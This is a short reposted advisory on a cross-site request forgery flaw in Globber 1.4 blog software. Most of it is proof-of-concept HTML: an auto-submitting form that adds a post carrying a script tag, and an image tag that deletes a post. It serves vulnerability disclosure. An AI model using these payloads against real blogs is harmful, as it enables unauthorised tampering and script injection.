Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>
Idioma: En

Globber 1.4 Cross-site Request Forgery

A cross-site Request Forgery vulnerability in Globber can be exploited
to add and delete blog posts.

PoC

<!-- Add (note that blog also must be "rebuilt") -->
<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://localhost/globber/admin.php?task=edit&c=Misc&a=new-article">
            <input type="hidden" name="title" value="New Article" />
            <input type="hidden" name="date" value="06-07-2010 10:16 pm" />
            <input type="hidden" name="tags" value="" />
            <input type="hidden" name="content" value="&lt;script&gt;alert(0)&lt;/script&gt;" />
        </form>
    </body>
</html>

<!-- Delete -->
<html>
    <body>
        <img src="http://localhost/globber/admin.php?task=articles&delc=Misc&dela=first-post" />
    </body>
</html>


This post first appeared on XSS - Cross-Site Scripting, please read the originial post: here

Share the post

Globber 1.4 Cross-site Request Forgery

×

Subscribe to Xss - Cross-site Scripting

Get updates delivered right to your inbox!

Thank you for your subscription

×